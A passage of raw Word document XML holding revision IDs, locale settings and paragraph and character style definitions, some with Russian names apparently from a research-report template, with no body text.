    <w:rsid w:val="00C17B25"/>
    <w:rsid w:val="00C21395"/>
    <w:rsid w:val="00C25938"/>
    <w:rsid w:val="00C25A49"/>
    <w:rsid w:val="00C260AF"/>
    <w:rsid w:val="00C2732E"/>
    <w:rsid w:val="00C27C90"/>
    <w:rsid w:val="00C33C4D"/>
    <w:rsid w:val="00C35425"/>
    <w:rsid w:val="00C3599A"/>
    <w:rsid w:val="00C35DB6"/>
    <w:rsid w:val="00C4006D"/>
    <w:rsid w:val="00C408E2"/>
    <w:rsid w:val="00C42CE8"/>
    <w:rsid w:val="00C46198"/>
    <w:rsid w:val="00C46599"/>
    <w:rsid w:val="00C4756C"/>
    <w:rsid w:val="00C477E6"/>
    <w:rsid w:val="00C5030F"/>
    <w:rsid w:val="00C530F8"/>
    <w:rsid w:val="00C5347E"/>
    <w:rsid w:val="00C53EB0"/>
    <w:rsid w:val="00C54DEE"/>
    <w:rsid w:val="00C5551C"/>
    <w:rsid w:val="00C56493"/>
    <w:rsid w:val="00C606F6"/>
    <w:rsid w:val="00C61B89"/>
    <w:rsid w:val="00C61FA3"/>
    <w:rsid w:val="00C6215D"/>
    <w:rsid w:val="00C634E5"/>
    <w:rsid w:val="00C719CF"/>
    <w:rsid w:val="00C71E36"/>
    <w:rsid w:val="00C73FEF"/>
    <w:rsid w:val="00C7419C"/>
    <w:rsid w:val="00C75D4A"/>
    <w:rsid w:val="00C7698F"/>
    <w:rsid w:val="00C776AE"/>
    <w:rsid w:val="00C804D5"/>
    <w:rsid w:val="00C80B1A"/>
    <w:rsid w:val="00C80E6F"/>
    <w:rsid w:val="00C82B97"/>
    <w:rsid w:val="00C840F9"/>
    <w:rsid w:val="00C87DF4"/>
    <w:rsid w:val="00C9267A"/>
    <w:rsid w:val="00C94688"/>
    <w:rsid w:val="00C96006"/>
    <w:rsid w:val="00C96FFF"/>
    <w:rsid w:val="00CA1960"/>
    <w:rsid w:val="00CA1964"/>
    <w:rsid w:val="00CA2AA8"/>
    <w:rsid w:val="00CA2BDD"/>
    <w:rsid w:val="00CA3914"/>
    <w:rsid w:val="00CA4366"/>
    <w:rsid w:val="00CA5190"/>
    <w:rsid w:val="00CA7B72"/>
    <w:rsid w:val="00CA7FAB"/>
    <w:rsid w:val="00CB00F3"/>
    <w:rsid w:val="00CB32FD"/>
    <w:rsid w:val="00CB36C5"/>
    <w:rsid w:val="00CB4544"/>
    <w:rsid w:val="00CB5F68"/>
    <w:rsid w:val="00CB6DA9"/>
    <w:rsid w:val="00CC134E"/>
    <w:rsid w:val="00CC1A10"/>
    <w:rsid w:val="00CC3EA2"/>
    <w:rsid w:val="00CD09EB"/>
    <w:rsid w:val="00CD13AF"/>
    <w:rsid w:val="00CD169F"/>
    <w:rsid w:val="00CD23B7"/>
    <w:rsid w:val="00CD4681"/>
    <w:rsid w:val="00CD62FC"/>
    <w:rsid w:val="00CD658D"/>
    <w:rsid w:val="00CE1680"/>
    <w:rsid w:val="00CE216B"/>
    <w:rsid w:val="00CE5178"/>
    <w:rsid w:val="00CE6D04"/>
    <w:rsid w:val="00CF18B7"/>
    <w:rsid w:val="00CF1D2A"/>
    <w:rsid w:val="00D0029D"/>
    <w:rsid w:val="00D02E7B"/>
    <w:rsid w:val="00D035EE"/>
    <w:rsid w:val="00D03BDB"/>
    <w:rsid w:val="00D05C97"/>
    <w:rsid w:val="00D06936"/>
    <w:rsid w:val="00D06F59"/>
    <w:rsid w:val="00D07846"/>
    <w:rsid w:val="00D10718"/>
    <w:rsid w:val="00D115EC"/>
    <w:rsid w:val="00D1276C"/>
    <w:rsid w:val="00D12907"/>
    <w:rsid w:val="00D136ED"/>
    <w:rsid w:val="00D15084"/>
    <w:rsid w:val="00D157EF"/>
    <w:rsid w:val="00D17AD1"/>
    <w:rsid w:val="00D20E3A"/>
    <w:rsid w:val="00D21598"/>
    <w:rsid w:val="00D237B5"/>
    <w:rsid w:val="00D24523"/>
    <w:rsid w:val="00D24BFC"/>
    <w:rsid w:val="00D267B6"/>
    <w:rsid w:val="00D27B31"/>
    <w:rsid w:val="00D3020E"/>
    <w:rsid w:val="00D32E65"/>
    <w:rsid w:val="00D33D29"/>
    <w:rsid w:val="00D34443"/>
    <w:rsid w:val="00D3702C"/>
    <w:rsid w:val="00D375B2"/>
    <w:rsid w:val="00D42315"/>
    <w:rsid w:val="00D432D8"/>
    <w:rsid w:val="00D44C37"/>
    <w:rsid w:val="00D45D3E"/>
    <w:rsid w:val="00D51DE1"/>
    <w:rsid w:val="00D534FC"/>
    <w:rsid w:val="00D54D12"/>
    <w:rsid w:val="00D607C7"/>
    <w:rsid w:val="00D6295F"/>
    <w:rsid w:val="00D633CF"/>
    <w:rsid w:val="00D73258"/>
    <w:rsid w:val="00D752A2"/>
    <w:rsid w:val="00D80616"/>
    <w:rsid w:val="00D82758"/>
    <w:rsid w:val="00D8280A"/>
    <w:rsid w:val="00D85D3B"/>
    <w:rsid w:val="00D86088"/>
    <w:rsid w:val="00D87C91"/>
    <w:rsid w:val="00D87F0D"/>
    <w:rsid w:val="00D923B7"/>
    <w:rsid w:val="00D95B58"/>
    <w:rsid w:val="00D97E54"/>
    <w:rsid w:val="00DA0AD4"/>
    <w:rsid w:val="00DA2F17"/>
    <w:rsid w:val="00DA38A5"/>
    <w:rsid w:val="00DA404D"/>
    <w:rsid w:val="00DB0E57"/>
    <w:rsid w:val="00DB328A"/>
    <w:rsid w:val="00DC3068"/>
    <w:rsid w:val="00DC37C1"/>
    <w:rsid w:val="00DC44AE"/>
    <w:rsid w:val="00DC4E08"/>
    <w:rsid w:val="00DD17E8"/>
    <w:rsid w:val="00DD2581"/>
    <w:rsid w:val="00DD31BC"/>
    <w:rsid w:val="00DD3F1B"/>
    <w:rsid w:val="00DD61B1"/>
    <w:rsid w:val="00DE1569"/>
    <w:rsid w:val="00DE17E9"/>
    <w:rsid w:val="00DE1B6D"/>
    <w:rsid w:val="00DE2E09"/>
    <w:rsid w:val="00DE4129"/>
    <w:rsid w:val="00DE4784"/>
    <w:rsid w:val="00DE5932"/>
    <w:rsid w:val="00DE5AF6"/>
    <w:rsid w:val="00DF23F0"/>
    <w:rsid w:val="00DF6020"/>
    <w:rsid w:val="00DF6EC4"/>
    <w:rsid w:val="00E01062"/>
    <w:rsid w:val="00E02D5C"/>
    <w:rsid w:val="00E043A7"/>
    <w:rsid w:val="00E04855"/>
    <w:rsid w:val="00E056F7"/>
    <w:rsid w:val="00E1129A"/>
    <w:rsid w:val="00E11FD2"/>
    <w:rsid w:val="00E12835"/>
    <w:rsid w:val="00E15099"/>
    <w:rsid w:val="00E17142"/>
    <w:rsid w:val="00E221C9"/>
    <w:rsid w:val="00E22D60"/>
    <w:rsid w:val="00E24D80"/>
    <w:rsid w:val="00E25740"/>
    <w:rsid w:val="00E27520"/>
    <w:rsid w:val="00E32E19"/>
    <w:rsid w:val="00E333CE"/>
    <w:rsid w:val="00E3760B"/>
    <w:rsid w:val="00E45293"/>
    <w:rsid w:val="00E455EC"/>
    <w:rsid w:val="00E46C42"/>
    <w:rsid w:val="00E4744F"/>
    <w:rsid w:val="00E47F75"/>
    <w:rsid w:val="00E50C32"/>
    <w:rsid w:val="00E517F7"/>
    <w:rsid w:val="00E52128"/>
    <w:rsid w:val="00E53E47"/>
    <w:rsid w:val="00E5499D"/>
    <w:rsid w:val="00E54A00"/>
    <w:rsid w:val="00E567F1"/>
    <w:rsid w:val="00E576CE"/>
    <w:rsid w:val="00E61D96"/>
    <w:rsid w:val="00E626B6"/>
    <w:rsid w:val="00E638A8"/>
    <w:rsid w:val="00E63EA7"/>
    <w:rsid w:val="00E669CB"/>
    <w:rsid w:val="00E7044D"/>
    <w:rsid w:val="00E704B3"/>
    <w:rsid w:val="00E73A27"/>
    <w:rsid w:val="00E73ECC"/>
    <w:rsid w:val="00E7598D"/>
    <w:rsid w:val="00E80438"/>
    <w:rsid w:val="00E8172E"/>
    <w:rsid w:val="00E81AB9"/>
    <w:rsid w:val="00E823E0"/>
    <w:rsid w:val="00E83C40"/>
    <w:rsid w:val="00E853D0"/>
    <w:rsid w:val="00E86C93"/>
    <w:rsid w:val="00E9121A"/>
    <w:rsid w:val="00E9153A"/>
    <w:rsid w:val="00E91DD8"/>
    <w:rsid w:val="00E927AC"/>
    <w:rsid w:val="00E92A06"/>
    <w:rsid w:val="00E940BE"/>
    <w:rsid w:val="00E95779"/>
    <w:rsid w:val="00E97CE2"/>
    <w:rsid w:val="00EA0F3B"/>
    <w:rsid w:val="00EB532E"/>
    <w:rsid w:val="00EC3777"/>
    <w:rsid w:val="00EC4D88"/>
    <w:rsid w:val="00EC740A"/>
    <w:rsid w:val="00EC7AA4"/>
    <w:rsid w:val="00ED0CD2"/>
    <w:rsid w:val="00ED2ADC"/>
    <w:rsid w:val="00ED3137"/>
    <w:rsid w:val="00ED47B4"/>
    <w:rsid w:val="00ED4A7C"/>
    <w:rsid w:val="00ED4E2A"/>
    <w:rsid w:val="00ED5D5C"/>
    <w:rsid w:val="00ED6132"/>
    <w:rsid w:val="00ED61B3"/>
    <w:rsid w:val="00ED7EE4"/>
    <w:rsid w:val="00EE0AB8"/>
    <w:rsid w:val="00EE59DA"/>
    <w:rsid w:val="00EE5CA2"/>
    <w:rsid w:val="00EF198B"/>
    <w:rsid w:val="00EF686C"/>
    <w:rsid w:val="00EF767E"/>
    <w:rsid w:val="00EF7982"/>
    <w:rsid w:val="00F02175"/>
    <w:rsid w:val="00F0240D"/>
    <w:rsid w:val="00F03DC1"/>
    <w:rsid w:val="00F0569E"/>
    <w:rsid w:val="00F06A6C"/>
    <w:rsid w:val="00F1089C"/>
    <w:rsid w:val="00F11F7B"/>
    <w:rsid w:val="00F12947"/>
    <w:rsid w:val="00F12F3C"/>
    <w:rsid w:val="00F133B4"/>
    <w:rsid w:val="00F15EE8"/>
    <w:rsid w:val="00F15F9B"/>
    <w:rsid w:val="00F21C94"/>
    <w:rsid w:val="00F22BE4"/>
    <w:rsid w:val="00F243A6"/>
    <w:rsid w:val="00F2585E"/>
    <w:rsid w:val="00F264CD"/>
    <w:rsid w:val="00F27728"/>
    <w:rsid w:val="00F277BC"/>
    <w:rsid w:val="00F31C91"/>
    <w:rsid w:val="00F31CCD"/>
    <w:rsid w:val="00F33188"/>
    <w:rsid w:val="00F33472"/>
    <w:rsid w:val="00F34BAB"/>
    <w:rsid w:val="00F34F3C"/>
    <w:rsid w:val="00F35DA3"/>
    <w:rsid w:val="00F363C6"/>
    <w:rsid w:val="00F4089D"/>
    <w:rsid w:val="00F412AC"/>
    <w:rsid w:val="00F42695"/>
    <w:rsid w:val="00F42AFA"/>
    <w:rsid w:val="00F42E0A"/>
    <w:rsid w:val="00F42F8F"/>
    <w:rsid w:val="00F47FAA"/>
    <w:rsid w:val="00F508AE"/>
    <w:rsid w:val="00F50E2E"/>
    <w:rsid w:val="00F52BF9"/>
    <w:rsid w:val="00F557D3"/>
    <w:rsid w:val="00F57D8A"/>
    <w:rsid w:val="00F60775"/>
    <w:rsid w:val="00F61C40"/>
    <w:rsid w:val="00F6520E"/>
    <w:rsid w:val="00F678FB"/>
    <w:rsid w:val="00F72134"/>
    <w:rsid w:val="00F735A3"/>
    <w:rsid w:val="00F735DF"/>
    <w:rsid w:val="00F73EB9"/>
    <w:rsid w:val="00F74FDD"/>
    <w:rsid w:val="00F76E42"/>
    <w:rsid w:val="00F7731B"/>
    <w:rsid w:val="00F81322"/>
    <w:rsid w:val="00F81C39"/>
    <w:rsid w:val="00F84BAF"/>
    <w:rsid w:val="00F86A7C"/>
    <w:rsid w:val="00F93F5C"/>
    <w:rsid w:val="00F9605E"/>
    <w:rsid w:val="00FA0F55"/>
    <w:rsid w:val="00FA262F"/>
    <w:rsid w:val="00FA476B"/>
    <w:rsid w:val="00FA791B"/>
    <w:rsid w:val="00FB0E47"/>
    <w:rsid w:val="00FB1D26"/>
    <w:rsid w:val="00FB3626"/>
    <w:rsid w:val="00FB3D28"/>
    <w:rsid w:val="00FB4EB7"/>
    <w:rsid w:val="00FC1441"/>
    <w:rsid w:val="00FC163F"/>
    <w:rsid w:val="00FC1BF5"/>
    <w:rsid w:val="00FC3B39"/>
    <w:rsid w:val="00FC52C1"/>
    <w:rsid w:val="00FC642D"/>
    <w:rsid w:val="00FD41B4"/>
    <w:rsid w:val="00FD4FCD"/>
    <w:rsid w:val="00FE1B5B"/>
    <w:rsid w:val="00FE5E91"/>
    <w:rsid w:val="00FE612D"/>
    <w:rsid w:val="00FE7405"/>
    <w:rsid w:val="00FF0393"/>
    <w:rsid w:val="00FF0F8B"/>
    <w:rsid w:val="00FF6408"/>
    <w:rsid w:val="00F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pt"/>
      <v:textbox inset="0,0,0,0"/>
    </o:shapedefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="2"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val=","/>
  <w:listSeparator w:val=";"/>
  <w14:docId w14:val="312CC9C2"/>
  <w15:docId w15:val="{C7CA7CC4-F3C3-4E2E-AB8B-34BD3EB6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heading 1" w:uiPriority="9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 w:qFormat="1"/>
    <w:lsdException w:name="List 3" w:semiHidden="1" w:qFormat="1"/>
    <w:lsdException w:name="List 4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 w:unhideWhenUsed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iPriority="0" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:uiPriority="0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1">
    <w:name w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EC7AA4"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1d">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="20"/>
    <w:link w:val="1e"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="709"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="114"/>
    <w:link w:val="21"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="360" w:after="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="114"/>
    <w:link w:val="30"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:tabs>
        <w:tab w:val="left" w:pos="709"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="360" w:after="240"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressLineNumbers/>
      <w:tabs>
        <w:tab w:val="left" w:pos="1843"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="360" w:after="240"/>
      <w:ind w:right="284"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="114"/>
    <w:link w:val="51"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressLineNumbers/>
      <w:tabs>
        <w:tab w:val="left" w:pos="1985"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="360" w:after="240"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="120"/>
      <w:ind w:right="284"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="120"/>
      <w:ind w:right="284"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:right="284"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:right="284"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20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e">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:link w:val="1d"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="page number"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3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/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ac">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:ind w:left="57" w:right="57"/>
    </w:pPr>
    <w:rPr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0">
    <w:name w:val="1_Заголовок 1_НИР"/>
    <w:basedOn w:val="1d"/>
    <w:next w:val="114"/>
    <w:link w:val="113"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="13"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="a1"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:ind w:right="284"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1f">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="1f0"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="425" w:hanging="425"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="240"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="1_Заголовок 2 Для приложений_НИР"/>
    <w:basedOn w:val="20"/>
    <w:next w:val="114"/>
    <w:link w:val="121"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="992" w:hanging="567"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:iCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="32"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1701" w:hanging="709"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="41">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="42"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2552" w:hanging="851"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="70">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="71"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1701"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f1">
    <w:name w:val="1_Маркированный_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
